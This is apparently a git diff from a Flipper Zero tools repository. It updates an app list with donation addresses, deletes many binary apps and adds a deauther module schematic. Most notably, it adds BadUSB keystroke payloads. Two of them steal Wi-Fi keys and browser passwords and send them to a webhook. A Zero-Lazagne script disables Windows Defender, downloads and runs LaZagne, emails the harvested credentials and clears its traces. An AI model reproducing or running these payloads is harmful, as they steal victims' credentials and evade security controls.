+- [Wifi Deauth v2 for ESP8266 (By Timmotools)](https://github.com/Timmotools/flipperzero_esp8266_deautherv2)
+
+## Tools / Misc
+- [Paint (By n-o-T-I-n-s-a-n-e)](https://github.com/n-o-T-I-n-s-a-n-e)
+- [Mouse Jiggler (By Jacob-Tate)](https://github.com/Jacob-Tate/flipperzero-firmware/blob/dev/applications/mouse_jiggler/mouse_jiggler.c) ([Original By MuddleBox](https://github.com/MuddledBox/))
+- [Calculator (By n-o-T-I-n-s-a-n-e)](https://github.com/n-o-T-I-n-s-a-n-e)
+- [Ceasar Cipher (By panki27)](https://github.com/panki27/caesar-cipher)
+- [Pomodoro Timer (By sbrin)](https://github.com/sbrin/flipperzero_pomodoro)
+
+-----
+
+I've had so many asking for me to add this.
+![Flipper_Blush](https://user-images.githubusercontent.com/57457139/183561666-4424a3cc-679b-4016-a368-24f7e7ad0a88.jpg) ![Flipper_Love](https://user-images.githubusercontent.com/57457139/183561692-381d37bd-264f-4c88-8877-e58d60d9be6e.jpg)
+
+**BTC**: `3AWgaL3FxquakP15ZVDxr8q8xVTc5Q75dS`
+**BCH**: `17nWCvf2YPMZ3F3H1seX8T149Z9E3BMKXk`
+**ETH**: `0x0f0003fCB0bD9355Ad7B124c30b9F3D860D5E191`
+**LTC**: `M8Ujk52U27bkm1ksiWUyteL8b3rRQVMke2`
+
+So, here it is. All donations of *any* size are humbly appreciated.
+![Flipper_Clap](https://user-images.githubusercontent.com/57457139/183561789-2e853ede-8ef7-41e8-a67c-716225177e5d.jpg) ![Flipper_OMG](https://user-images.githubusercontent.com/57457139/183561787-e21bdc1e-b316-4e67-b327-5129503d0313.jpg)
+
+Donations will be used for hardware (and maybe caffeine) to further testing!
+![UberGuidoZ](https://cdn.discordapp.com/emojis/1000632669622767686.gif)
diff --git a/Applications/Unleashed/GPIO/esp8266_deauth.fap b/Applications/Unleashed/GPIO/esp8266_deauth.fap
deleted file mode 100644
index 95c54e2a..00000000
Binary files a/Applications/Unleashed/GPIO/esp8266_deauth.fap and /dev/null differ
diff --git a/Applications/Unleashed/GPIO/mouse_jacker.fap b/Applications/Unleashed/GPIO/mouse_jacker.fap
deleted file mode 100644
index 0f91e224..00000000
Binary files a/Applications/Unleashed/GPIO/mouse_jacker.fap and /dev/null differ
diff --git a/Applications/Unleashed/GPIO/nrf_sniff.fap b/Applications/Unleashed/GPIO/nrf_sniff.fap
deleted file mode 100644
index 9a96c97d..00000000
Binary files a/Applications/Unleashed/GPIO/nrf_sniff.fap and /dev/null differ
diff --git a/Applications/Unleashed/GPIO/sentry_safe.fap b/Applications/Unleashed/GPIO/sentry_safe.fap
deleted file mode 100644
index 81b53087..00000000
Binary files a/Applications/Unleashed/GPIO/sentry_safe.fap and /dev/null differ
diff --git a/Applications/Unleashed/GPIO/wifi_marauder.fap b/Applications/Unleashed/GPIO/wifi_marauder.fap
deleted file mode 100644
index 1bb57f1f..00000000
Binary files a/Applications/Unleashed/GPIO/wifi_marauder.fap and /dev/null differ
diff --git a/Applications/Unleashed/GPIO/wifi_scanner.fap b/Applications/Unleashed/GPIO/wifi_scanner.fap
deleted file mode 100644
index e830a7e3..00000000
Binary files a/Applications/Unleashed/GPIO/wifi_scanner.fap and /dev/null differ
diff --git a/Applications/Unleashed/Games/arkanoid_game.fap b/Applications/Unleashed/Games/arkanoid_game.fap
deleted file mode 100644
index 451ba1d1..00000000
Binary files a/Applications/Unleashed/Games/arkanoid_game.fap and /dev/null differ
diff --git a/Applications/Unleashed/Games/game_doom.fap b/Applications/Unleashed/Games/game_doom.fap
deleted file mode 100644
index 06968d80..00000000
Binary files a/Applications/Unleashed/Games/game_doom.fap and /dev/null differ
diff --git a/Applications/Unleashed/Games/game_flappybird.fap b/Applications/Unleashed/Games/game_flappybird.fap
deleted file mode 100644
index 5874ae00..00000000
Binary files a/Applications/Unleashed/Games/game_flappybird.fap and /dev/null differ
diff --git a/Applications/Unleashed/Games/game_zombiez.fap b/Applications/Unleashed/Games/game_zombiez.fap
deleted file mode 100644
index 7589a999..00000000
Binary files a/Applications/Unleashed/Games/game_zombiez.fap and /dev/null differ
diff --git a/Applications/Unleashed/Games/snake_game.fap b/Applications/Unleashed/Games/snake_game.fap
deleted file mode 100644
index c568d085..00000000
Binary files a/Applications/Unleashed/Games/snake_game.fap and /dev/null differ
diff --git a/Applications/Unleashed/Games/tetris_game.fap b/Applications/Unleashed/Games/tetris_game.fap
deleted file mode 100644
index c0c0d5e8..00000000
Binary files a/Applications/Unleashed/Games/tetris_game.fap and /dev/null differ
diff --git a/Applications/Unleashed/Games/tictactoe_game.fap b/Applications/Unleashed/Games/tictactoe_game.fap
deleted file mode 100644
index e7243763..00000000
Binary files a/Applications/Unleashed/Games/tictactoe_game.fap and /dev/null differ
diff --git a/Applications/Unleashed/Games_Extra/BROKEN_game_chess.fap b/Applications/Unleashed/Games_Extra/BROKEN_game_chess.fap
deleted file mode 100644
index db69127b..00000000
Binary files a/Applications/Unleashed/Games_Extra/BROKEN_game_chess.fap and /dev/null differ
diff --git a/Applications/Unleashed/Games_Extra/game_gameoflife.fap b/Applications/Unleashed/Games_Extra/game_gameoflife.fap
deleted file mode 100644
index 79c32e68..00000000
Binary files a/Applications/Unleashed/Games_Extra/game_gameoflife.fap and /dev/null differ
diff --git a/Applications/Unleashed/Games_Extra/game_mandelbrotset.fap b/Applications/Unleashed/Games_Extra/game_mandelbrotset.fap
deleted file mode 100644
index a37429aa..00000000
Binary files a/Applications/Unleashed/Games_Extra/game_mandelbrotset.fap and /dev/null differ
diff --git a/Applications/Unleashed/Games_Extra/game_montyhall.fap b/Applications/Unleashed/Games_Extra/game_montyhall.fap
deleted file mode 100644
index 407240f5..00000000
Binary files a/Applications/Unleashed/Games_Extra/game_montyhall.fap and /dev/null differ
diff --git a/Applications/Unleashed/Games_Extra/game_tama_p1.fap b/Applications/Unleashed/Games_Extra/game_tama_p1.fap
deleted file mode 100644
index 2e324a2e..00000000
Binary files a/Applications/Unleashed/Games_Extra/game_tama_p1.fap and /dev/null differ
diff --git a/Applications/Unleashed/Games_Extra/game_tanks.fap b/Applications/Unleashed/Games_Extra/game_tanks.fap
deleted file mode 100644
index 153542d4..00000000
Binary files a/Applications/Unleashed/Games_Extra/game_tanks.fap and /dev/null differ
diff --git a/Applications/Unleashed/Games_Extra/game_videopoker.fap b/Applications/Unleashed/Games_Extra/game_videopoker.fap
deleted file mode 100644
index 5ed9c344..00000000
Binary files a/Applications/Unleashed/Games_Extra/game_videopoker.fap and /dev/null differ
diff --git a/Applications/Unleashed/Misc/barcode_generator.fap b/Applications/Unleashed/Misc/barcode_generator.fap
deleted file mode 100644
index 3ec0669b..00000000
Binary files a/Applications/Unleashed/Misc/barcode_generator.fap and /dev/null differ
diff --git a/Applications/Unleashed/Misc/multi_converter.fap b/Applications/Unleashed/Misc/multi_converter.fap
deleted file mode 100644
index 2a9efa41..00000000
Binary files a/Applications/Unleashed/Misc/multi_converter.fap and /dev/null differ
diff --git a/Applications/Unleashed/Misc/music_player.fap b/Applications/Unleashed/Misc/music_player.fap
deleted file mode 100644
index 0319781e..00000000
Binary files a/Applications/Unleashed/Misc/music_player.fap and /dev/null differ
diff --git a/Applications/Unleashed/Misc/uart_echo.fap b/Applications/Unleashed/Misc/uart_echo.fap
deleted file mode 100644
index 1524a359..00000000
Binary files a/Applications/Unleashed/Misc/uart_echo.fap and /dev/null differ
diff --git a/Applications/Unleashed/Misc/usb_mouse.fap b/Applications/Unleashed/Misc/usb_mouse.fap
deleted file mode 100644
index 6a9ff1e4..00000000
Binary files a/Applications/Unleashed/Misc/usb_mouse.fap and /dev/null differ
diff --git a/Applications/Unleashed/Misc_Extra/app_wifi_deauther.fap b/Applications/Unleashed/Misc_Extra/app_wifi_deauther.fap
deleted file mode 100644
index d1eaf0b4..00000000
Binary files a/Applications/Unleashed/Misc_Extra/app_wifi_deauther.fap and /dev/null differ
diff --git a/Applications/Unleashed/Misc_Extra/calculator.fap b/Applications/Unleashed/Misc_Extra/calculator.fap
deleted file mode 100644
index c1994f25..00000000
Binary files a/Applications/Unleashed/Misc_Extra/calculator.fap and /dev/null differ
diff --git a/Applications/Unleashed/Misc_Extra/mousejiggler.fap b/Applications/Unleashed/Misc_Extra/mousejiggler.fap
deleted file mode 100644
index ad001320..00000000
Binary files a/Applications/Unleashed/Misc_Extra/mousejiggler.fap and /dev/null differ
diff --git a/Applications/Unleashed/Misc_Extra/paint.fap b/Applications/Unleashed/Misc_Extra/paint.fap
deleted file mode 100644
index a1efdcf4..00000000
Binary files a/Applications/Unleashed/Misc_Extra/paint.fap and /dev/null differ
diff --git a/Applications/Unleashed/Music/music_player.fap b/Applications/Unleashed/Music/music_player.fap
deleted file mode 100644
index 9ebe9c93..00000000
Binary files a/Applications/Unleashed/Music/music_player.fap and /dev/null differ
diff --git a/Applications/Unleashed/Music/wav_player.fap b/Applications/Unleashed/Music/wav_player.fap
deleted file mode 100644
index bae21cb3..00000000
Binary files a/Applications/Unleashed/Music/wav_player.fap and /dev/null differ
diff --git a/Applications/Unleashed/Some_Sources.zip b/Applications/Unleashed/Some_Sources.zip
deleted file mode 100644
index a4d8d7cc..00000000
Binary files a/Applications/Unleashed/Some_Sources.zip and /dev/null differ
diff --git a/Applications/Unleashed/Tools/bt_hid.fap b/Applications/Unleashed/Tools/bt_hid.fap
deleted file mode 100644
index c71ecf0b..00000000
Binary files a/Applications/Unleashed/Tools/bt_hid.fap and /dev/null differ
diff --git a/Applications/Unleashed/Tools/flipfrid.fap b/Applications/Unleashed/Tools/flipfrid.fap
deleted file mode 100644
index 78315c93..00000000
Binary files a/Applications/Unleashed/Tools/flipfrid.fap and /dev/null differ
diff --git a/Applications/Unleashed/Tools/picopass.fap b/Applications/Unleashed/Tools/picopass.fap
deleted file mode 100644
index 60a81836..00000000
Binary files a/Applications/Unleashed/Tools/picopass.fap and /dev/null differ
diff --git a/Applications/Unleashed/Tools/spectrum_analyzer.fap b/Applications/Unleashed/Tools/spectrum_analyzer.fap
deleted file mode 100644
index f5c2047f..00000000
Binary files a/Applications/Unleashed/Tools/spectrum_analyzer.fap and /dev/null differ
diff --git a/Applications/Unleashed/Tools/sub_playlist.fap b/Applications/Unleashed/Tools/sub_playlist.fap
deleted file mode 100644
index 64d89172..00000000
Binary files a/Applications/Unleashed/Tools/sub_playlist.fap and /dev/null differ
diff --git a/Applications/Unleashed/Tools/subbrute.fap b/Applications/Unleashed/Tools/subbrute.fap
deleted file mode 100644
index 802933ae..00000000
Binary files a/Applications/Unleashed/Tools/subbrute.fap and /dev/null differ
diff --git a/BadUSB/BadUSB-FalsePhilosopher b/BadUSB/BadUSB-FalsePhilosopher
index bfbcf86e..5d0d575f 160000
--- a/BadUSB/BadUSB-FalsePhilosopher
+++ b/BadUSB/BadUSB-FalsePhilosopher
@@ -1 +1 @@
-Subproject commit bfbcf86e0aa73cf859718424934d2ec023f6b36f
+Subproject commit 5d0d575fd72ad314e8881e04a73cf427bd592b11
diff --git a/BadUSB/Get-Connected-USBs.txt b/BadUSB/Get-Connected-USBs.txt
index f8463b5c..6cb4d75f 100644
--- a/BadUSB/Get-Connected-USBs.txt
+++ b/BadUSB/Get-Connected-USBs.txt
@@ -1,4 +1,4 @@
-REM Title: Get-Connected-USBs
+REM Title: Get-Connected-USBs
REM Author: atomicsec
REM Source: https://github.com/atomiczsec/Get-Connected-USBs
REM Generator: https://github.com/I-Am-Jakoby/Powershell-to-Ducky-Converter
diff --git a/BadUSB/Hey_Everybody.txt b/BadUSB/Hey_Everybody.txt
index ae82d68d..450b01ad 100644
--- a/BadUSB/Hey_Everybody.txt
+++ b/BadUSB/Hey_Everybody.txt
@@ -13,4 +13,5 @@ DELAY 250
STRING $sp=New-Object -ComObject SAPI.SpVoice
ENTER
DELAY 250
-STRING $sp.Speak("Hey everybody! I plugged in something I should not have.")
\ No newline at end of file
+STRING $sp.Speak("Hey everybody! I plugged in something I should not have.")
+ENTER
diff --git a/BadUSB/PingMe.txt b/BadUSB/PingMe.txt
new file mode 100644
index 00000000..07abb224
--- /dev/null
+++ b/BadUSB/PingMe.txt
@@ -0,0 +1,13 @@
+REM Title: PingMe
+REM Author: 7h30th3r0n3
+REM Target: Windows 7/8/10/11
+REM Version: 1
+REM Category: Grabber
+REM Designed to be used for mouse hijacking to find out if it is connected to the internet
+GUI r
+DELAY 400
+STRING powershell
+ENTER
+DELAY 400
+STRING Invoke-WebRequest -Uri https://webhook.site/ -Method GET;exit
+ENTER
diff --git a/BadUSB/PoC_Discord_Webhook.txt b/BadUSB/PoC_Discord_Webhook.txt
new file mode 100644
index 00000000..1dbd1704
--- /dev/null
+++ b/BadUSB/PoC_Discord_Webhook.txt
@@ -0,0 +1,26 @@
+REM Description: PoC fileless Flipper BadUSB exfil to discord webhook
+REM Author: Vojnomir Malenkov
+REM Based on https://github.com/atomiczsec/My-Payloads/blob/main/RubberDucky/payloads/Copy-And-Waste/c.ps1
+GUI r
+DELAY 500
+STRING powershell
+ENTER
+DELAY 500
+STRING [String]$contentbody = "this is a test of exfil data via webhook"
+ENTER
+DELAY 400
+STRING $Body = @{
+ENTER
+DELAY 300
+STRING 'username'= 'loot'
+ENTER
+DELAY 200
+STRING 'content' = $contentbody }
+ENTER
+DELAY 500
+STRING iwr -Uri DISCORD-WEBHOOK-HERE -Method POST -Body $Body
+DELAY 500
+ENTER
+STRING exit
+DELAY 200
+ENTER
diff --git a/BadUSB/ReadMe.md b/BadUSB/ReadMe.md
index 52b65688..d297e652 100644
--- a/BadUSB/ReadMe.md
+++ b/BadUSB/ReadMe.md
@@ -1,6 +1,7 @@
# BadUSB scripts I've created, converted, or collected.
-Proper credit is always provided; I simply request the same.
+Proper credit is always provided; I simply request the same.
+[Check out this nice list of keys you can use in your scripts!](https://gist.github.com/methanoliver/efebfe8f4008e167417d4ab96e5e3cac)
## Many more should work from my other repos: [O.MG Devices](https://github.com/UberGuidoZ/Hak5-OMG-Payloads) and [Hak5](https://github.com/UberGuidoZ/Hak5-USBRubberducky-Payloads)
diff --git a/BadUSB/Wifi_and_Show_Passwords_for_Flipper.txt b/BadUSB/Wifi_and_Show_Passwords_for_Flipper.txt
new file mode 100644
index 00000000..41f3195e
--- /dev/null
+++ b/BadUSB/Wifi_and_Show_Passwords_for_Flipper.txt
@@ -0,0 +1,69 @@
+REM Polish made the WIFI part I got the passwords part from https://github.com/UberGuidoZ/Flipper/blob/main/BadUSB/Show_Saved_Passwords.txt
+REM Big Credit to UberGuidoZ
+REM Target Win 10
+REM Sending WIFI Passwords through a webhook
+REM Replace with your webhook like https://webhook.site/4f8b246c-2071-49c5-baa6-07983dffc024
+GUI r
+DELAY 500
+STRING CMD
+ENTER
+DELAY 500
+STRING cd %temp%
+ENTER
+DELAY 300
+STRING netsh wlan export profile key=clear
+ENTER
+DELAY 500
+STRING powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS
+ENTER
+DELAY 500
+STRING powershell Invoke-WebRequest -Uri -Method POST -InFile Wi-Fi-PASS
+ENTER
+DELAY 1000
+STRING del Wi-* /s /f /q
+ENTER
+DELAY 500
+STRING exit
+ENTER
+DELAY 1000
+GUI r
+ENTER
+DELAY 500
+STRING notepad
+ENTER
+DELAY 500
+STRING I'm Sorry my Kind Sir, I did steal your wifi Passwords.
+GUI r
+DELAY 1000
+STRING powershell
+ENTER
+DELAY 1000
+STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Headers @{'Referer' = 'http://www.nirsoft.net/utils/web_browser_password.html'} -Uri http://www.nirsoft.net/toolsdownload/webbrowserpassview.zip -OutFile wbpv.zip ; Invoke-WebRequest -Uri https://www.7-zip.org/a/7za920.zip -OutFile 7z.zip ; Expand-Archive 7z.zip ; .\7z\7za.exe e wbpv.zip
+ENTER
+DELAY 5000
+STRING wbpv28821@
+ENTER
+STRING .\WebBrowserPassView.exe
+ENTER
+DELAY 3000
+CTRL A
+CTRL S
+DELAY 1000
+STRING export.html
+TAB
+STRING h
+ENTER
+DELAY 1000
+ALT F4
+DELAY 1000
+STRING Start-Process msedge.exe 'file:///C:/temp/export.htm --inprivate'
+ENTER
+DELAY 2000
+ALT TAB
+DELAY 1000
+STRING cd \
+ENTER
+STRING rmdir -R \temp
+ENTER
+STRING EXIT
+ENTER
diff --git a/BadUSB/Wifi_for_Flipper.txt b/BadUSB/Wifi_for_Flipper.txt
new file mode 100644
index 00000000..4a9ee940
--- /dev/null
+++ b/BadUSB/Wifi_for_Flipper.txt
@@ -0,0 +1,34 @@
+REM Polish made this trying to code.
+REM Target Win 10
+REM Sending WIFI Passwords through a webhook
+REM Replace with your webhook like https://webhook.site/4f8b246c-2071-49c5-baa6-07983dffc024
+GUI r
+DELAY 500
+STRING CMD
+ENTER
+DELAY 500
+STRING cd %temp%
+ENTER
+DELAY 300
+STRING netsh wlan export profile key=clear
+ENTER
+DELAY 500
+STRING powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS
+ENTER
+DELAY 500
+STRING powershell Invoke-WebRequest -Uri -Method POST -InFile Wi-Fi-PASS
+ENTER
+DELAY 1000
+STRING del Wi-* /s /f /q
+ENTER
+DELAY 500
+STRING exit
+ENTER
+DELAY 1000
+GUI r
+ENTER
+DELAY 500
+STRING notepad
+ENTER
+DELAY 500
+STRING I'm Sorry my Kind Sir, I did steal your wifi Passwords.
diff --git a/BadUSB/Zero-Lazagne/README.md b/BadUSB/Zero-Lazagne/README.md
new file mode 100644
index 00000000..e06f2e27
--- /dev/null
+++ b/BadUSB/Zero-Lazagne/README.md
@@ -0,0 +1,4 @@
+# Zero-Lazagne
+Bad Usb payload capable to capture victim's passwords (hiding powershell) and e-mailing them to you. Inspired by "Hasta Lasagna!", developed by [m4ki3lf0](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/credentials/Hasta%20lasagna!) for Rubber Ducky, and optimized for Flipper Zero. You'll need only the .txt file for the exfiltration.
+## Notes
+Tested with Unleashed Firmware and a SMTP without SSL (port 25) to send the e-mail. The 2.4.2 version of lazagne.exe is a bit faster, anyway it's possibile to replace the download link with the latest version.
diff --git a/BadUSB/Zero-Lazagne/Zero-Lazagne.txt b/BadUSB/Zero-Lazagne/Zero-Lazagne.txt
new file mode 100644
index 00000000..3a523ef9
--- /dev/null
+++ b/BadUSB/Zero-Lazagne/Zero-Lazagne.txt
@@ -0,0 +1,76 @@
+REM Open Powershell as Admin
+DEFAULT_DELAY 300
+DELAY 1000
+GUI r
+STRING powershell
+CTRL-SHIFT ENTER
+DELAY 2000
+LEFT
+ENTER
+DELAY 1000
+REM
+REM Hide Powershell (Remember to extract Flipper only when it displays 100%)
+STRING PowerShell.exe -WindowStyle hidden
+ENTER
+REM
+REM Disable real time protection
+STRING Set-MpPreference -DisableRealtimeMonitoring $true
+ENTER
+REM
+REM Create a tmp directory in Downloads folder
+STRING $dir = "C:\Users\$env:UserName\Downloads\tmp"
+ENTER
+STRING New-Item -ItemType Directory -Path $dir
+ENTER
+REM
+REM Add an exception to Windows Defender for the tmp directory
+STRING Add-MpPreference -ExclusionPath $dir
+ENTER
+REM
+REM Hide the directory
+STRING $hide = Get-Item $dir -Force
+ENTER
+STRING $hide.attributes='Hidden'
+ENTER
+REM
+REM Download the executable (version 2.4.2 is a bit faster, you can change the download link to the latest version)
+STRING Invoke-WebRequest -Uri "https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.2/lazagne.exe" -OutFile "$dir\lazagne.exe"
+ENTER
+REM
+REM Execute lazagne.exe and save output to a file
+STRING & "$dir\lazagne.exe" all > "$dir\output.txt"
+ENTER
+REM
+REM Mail Exfiltration
+STRING $smtp = "INSERT YOUR SMTP HERE"
+ENTER
+STRING $From = "INSERT YOUR EMAIL HERE"
+ENTER
+STRING $To = "INSERT RECEIVER EMAIL HERE"
+ENTER
+STRING $Subject = "Zero-Lazagne Report"
+ENTER
+STRING $Body = "Hi, here is the Report"
+ENTER
+STRING $Password = "INSERT YOUR PASSWORD HERE" | ConvertTo-SecureString -AsPlainText -Force
+ENTER
+STRING $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $From, $Password
+ENTER
+REM
+REM Send the mail. Tested without SSl. You can try to add "-Use Ssl" and change the port (465 or 587 based on your SMTP)
+STRING Send-MailMessage -From $From -To $To -Subject $Subject -Body $Body -Attachments "$dir\output.txt" -SmtpServer $smtp -port 25 -Credential $Credential
+ENTER
+REM
+REM Clean up
+STRING Remove-Item -Path $dir -Recurse -Force
+ENTER
+STRING Set-MpPreference -DisableRealtimeMonitoring $false
+ENTER
+STRING Remove-MpPreference -ExclusionPath $dir
+ENTER
+REM
+REM Remove the script from the system and exit from powershell
+STRING Clear-History
+ENTER
+STRING exit
+ENTER
diff --git a/Dolphin_Level/ReadMe.md b/Dolphin_Level/ReadMe.md
index f7bdc95f..09d622f8 100644
--- a/Dolphin_Level/ReadMe.md
+++ b/Dolphin_Level/ReadMe.md
@@ -1,4 +1,5 @@
-# Upgrade or Downgrade your Flipper level (Official firmware)!
+# Upgrade or Downgrade your Flipper level (Official /Unleashed)!
+## If you're running RogueMaster with the additional levels, read below [then go here](https://github.com/UberGuidoZ/Flipper/tree/main/Dolphin_Level/RogueMaster).
## NOTE: To fix issue with recent firmware changes, file should start with a period `.`
diff --git a/GPIO/ESP8266_WIFI_Schematic.pdf b/GPIO/ESP8266_WIFI_Schematic.pdf
new file mode 100644
index 00000000..fe55ad38
--- /dev/null
+++ b/GPIO/ESP8266_WIFI_Schematic.pdf
@@ -0,0 +1,2514 @@
+%PDF-1.4
+%ºß¬à
+3 0 obj
+<>
+endobj
+4 0 obj
+<<
+/Length 25807
+>>
+stream
+0.20 w
+0 G
+2 J
+0 j
+100 M
+1.00 g
+[] 0 d
+0.00 827.40 1169.00 -827.40 re
+f
+1 J
+1 j
+1.00 w
+0.53 0.00 0.00 RG
+[] 0 d
+216.000 806.500 m
+216.000 816.500 l
+216.000 20.500 m
+216.000 10.500 l
+412.000 806.500 m
+412.000 816.500 l
+412.000 20.500 m
+412.000 10.500 l
+608.000 806.500 m
+608.000 816.500 l
+608.000 20.500 m
+608.000 10.500 l
+804.000 806.500 m
+804.000 816.500 l
+804.000 20.500 m
+804.000 10.500 l
+1000.000 806.500 m
+1000.000 816.500 l
+1000.000 20.500 m
+1000.000 10.500 l
+20.000 610.500 m
+10.000 610.500 l
+1149.000 610.500 m
+1159.000 610.500 l
+20.000 414.500 m
+10.000 414.500 l
+1149.000 414.500 m
+1159.000 414.500 l
+20.000 218.500 m
+10.000 218.500 l
+1149.000 218.500 m
+1159.000 218.500 l
+20.000 22.500 m
+10.000 22.500 l
+1149.000 22.500 m
+1159.000 22.500 l
+S
+10.00 w
+BT
+/F1 9 Tf
+9.00 TL
+0.533 0.000 0.000 rg
+11.50 708.50 Td
+(A) Tj
+ET
+10.00 w
+BT
+/F1 9 Tf
+9.00 TL
+0.533 0.000 0.000 rg
+1150.50 708.50 Td
+(A) Tj
+ET
+10.00 w
+BT
+/F1 9 Tf
+9.00 TL
+0.533 0.000 0.000 rg
+11.50 512.50 Td
+(B) Tj
+ET
+10.00 w
+BT
+/F1 9 Tf
+9.00 TL
+0.533 0.000 0.000 rg
+1150.50 512.50 Td
+(B) Tj
+ET
+10.00 w
+BT
+/F1 9 Tf
+9.00 TL
+0.533 0.000 0.000 rg
+11.50 316.50 Td
+(C) Tj
+ET
+10.00 w
+BT
+/F1 9 Tf
+9.00 TL
+0.533 0.000 0.000 rg
+1150.50 316.50 Td
+(C) Tj
+ET
+10.00 w
+BT
+/F1 9 Tf
+9.00 TL
+0.533 0.000 0.000 rg
+11.50 120.50 Td
+(D) Tj
+ET
+10.00 w
+BT
+/F1 9 Tf
+9.00 TL
+0.533 0.000 0.000 rg
+1150.50 120.50 Td
+(D) Tj
+ET
+10.00 w
+BT
+/F1 9 Tf
+9.00 TL
+0.533 0.000 0.000 rg
+118.00 808.00 Td
+(1) Tj
+ET
+10.00 w
+BT
+/F1 9 Tf
+9.00 TL
+0.533 0.000 0.000 rg
+118.00 12.00 Td
+(1) Tj
+ET
+10.00 w
+BT
+/F1 9 Tf
+9.00 TL
+0.533 0.000 0.000 rg
+314.00 808.00 Td
+(2) Tj
+ET
+10.00 w
+BT
+/F1 9 Tf
+9.00 TL
+0.533 0.000 0.000 rg
+314.00 12.00 Td
+(2) Tj
+ET
+10.00 w
+BT
+/F1 9 Tf
+9.00 TL
+0.533 0.000 0.000 rg
+510.00 808.00 Td
+(3) Tj
+ET
+10.00 w
+BT
+/F1 9 Tf
+9.00 TL
+0.533 0.000 0.000 rg
+510.00 12.00 Td
+(3) Tj
+ET
+10.00 w
+BT
+/F1 9 Tf
+9.00 TL
+0.533 0.000 0.000 rg
+706.00 808.00 Td
+(4) Tj
+ET
+10.00 w
+BT
+/F1 9 Tf
+9.00 TL
+0.533 0.000 0.000 rg
+706.00 12.00 Td
+(4) Tj
+ET
+10.00 w
+BT
+/F1 9 Tf
+9.00 TL
+0.533 0.000 0.000 rg
+902.00 808.00 Td
+(5) Tj
+ET
+10.00 w
+BT
+/F1 9 Tf
+9.00 TL
+0.533 0.000 0.000 rg
+902.00 12.00 Td
+(5) Tj
+ET
+2 J
+0 j
+100 M
+1.00 w
+0.53 0.00 0.00 RG
+[] 0 d
+20.00 806.50 1129.00 -786.00 re
+S
+2 J
+0 j
+100 M
+1.00 w
+0.53 0.00 0.00 RG
+[] 0 d
+10.00 816.50 1149.00 -806.00 re
+S
+2 J
+0 j
+100 M
+1.00 w
+0.53 0.00 0.00 RG
+[] 0 d
+705.00 100.50 444.00 -80.00 re
+S
+1 J
+1 j
+1.00 w
+0.53 0.00 0.00 RG
+0.00 g
+[] 0 d
+705.100 61.250 m
+1148.630 61.250 l
+S
+1 J
+1 j
+1.00 w
+0.53 0.00 0.00 RG
+0.00 g
+[] 0 d
+809.630 41.250 m
+1148.630 41.250 l
+S
+1 J
+1 j
+1.00 w
+0.53 0.00 0.00 RG
+0.00 g
+[] 0 d
+1069.610 100.430 m
+1069.630 61.250 l
+S
+1 J
+1 j
+1.00 w
+0.53 0.00 0.00 RG
+0.00 g
+[] 0 d
+1069.630 61.250 m
+1069.630 41.250 l
+S
+10.00 w
+BT
+/F1 11 Tf
+11.00 TL
+0.533 0.000 0.000 rg
+710.00 87.50 Td
+(TITLE:) Tj
+ET
+10.00 w
+BT
+/F1 13 Tf
+13.00 TL
+0.000 0.000 1.000 rg
+750.00 75.50 Td
+(FlipperZero-Wifi-ESP8266-Deauther-Module) Tj
+ET
+10.00 w
+BT
+/F1 11 Tf
+11.00 TL
+0.533 0.000 0.000 rg
+1074.62 74.25 Td
+(REV:) Tj
+ET
+10.00 w
+BT
+/F1 12 Tf
+12.00 TL
+0.000 0.000 1.000 rg
+1112.62 74.25 Td
+(1.0) Tj
+ET
+10.00 w
+BT
+/F1 11 Tf
+11.00 TL
+0.533 0.000 0.000 rg
+814.62 25.50 Td
+(Date:) Tj
+ET
+10.00 w
+BT
+/F1 12 Tf
+12.00 TL
+0.000 0.000 1.000 rg
+861.62 25.02 Td
+(2022-06-26) Tj
+ET
+10.00 w
+BT
+/F1 11 Tf
+11.00 TL
+0.533 0.000 0.000 rg
+1073.62 45.50 Td
+(Sheet:) Tj
+ET
+10.00 w
+BT
+/F1 12 Tf
+12.00 TL
+0.000 0.000 1.000 rg
+1118.62 45.02 Td
+(1/1) Tj
+ET
+10.00 w
+BT
+/F1 11 Tf
+11.00 TL
+0.533 0.000 0.000 rg
+953.62 25.25 Td
+(Drawn By:) Tj
+ET
+10.00 w
+BT
+/F1 12 Tf
+12.00 TL
+0.000 0.000 1.000 rg
+1018.63 25.25 Td
+(Davide Gatti) Tj
+ET
+10.00 w
+BT
+/F1 11 Tf
+11.00 TL
+0.533 0.000 0.000 rg
+814.62 47.25 Td
+(Company:) Tj
+ET
+10.00 w
+BT
+/F1 12 Tf
+12.00 TL
+0.000 0.000 1.000 rg
+881.25 47.14 Td
+(Survival Hacking) Tj
+ET
+1 J
+1 j
+1.00 w
+0.53 0.00 0.00 RG
+0.00 g
+[] 0 d
+809.630 61.250 m
+809.630 21.250 l
+S
+10.00 w
+BT
+/F2 48 Tf
+48.00 TL
+0.000 g
+95.00 720.50 Td
+(FLIPPER ZERO WI-FI DEAUTHER MODULE) Tj
+ET
+q
+315.00 0 0 335.00 765.00 275.50 cm
+/I0 Do
+Q
+10.00 w
+BT
+/F3 16 Tf
+16.00 TL
+0.000 g
+220.00 695.50 Td
+(https://github.com/SequoiaSan/FlipperZero-Wifi-ESP8266-Deauther-Module) Tj
+ET
+q
+35.00 0 0 36.00 745.00 24.50 cm
+/I0 Do
+Q
+10.00 w
+BT
+/F4 9 Tf
+9.00 TL
+0.000 0.000 0.502 rg
+526.88 322.23 Td
+(Flipper Zero GPIO) Tj
+ET
+10.00 w
+BT
+/F4 9 Tf
+9.00 TL
+0.000 0.000 0.502 rg
+559.03 332.23 Td
+(J1) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+552.00 302.50 Td
+(5v) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+539.28 306.50 Td
+(1) Tj
+ET
+1 J
+1 j
+1.00 w
+0.53 0.00 0.00 RG
+[] 0 d
+530.000 305.500 m
+550.000 305.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+552.00 292.50 Td
+(A7) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+539.28 296.50 Td
+(2) Tj
+ET
+1 J
+1 j
+1.00 w
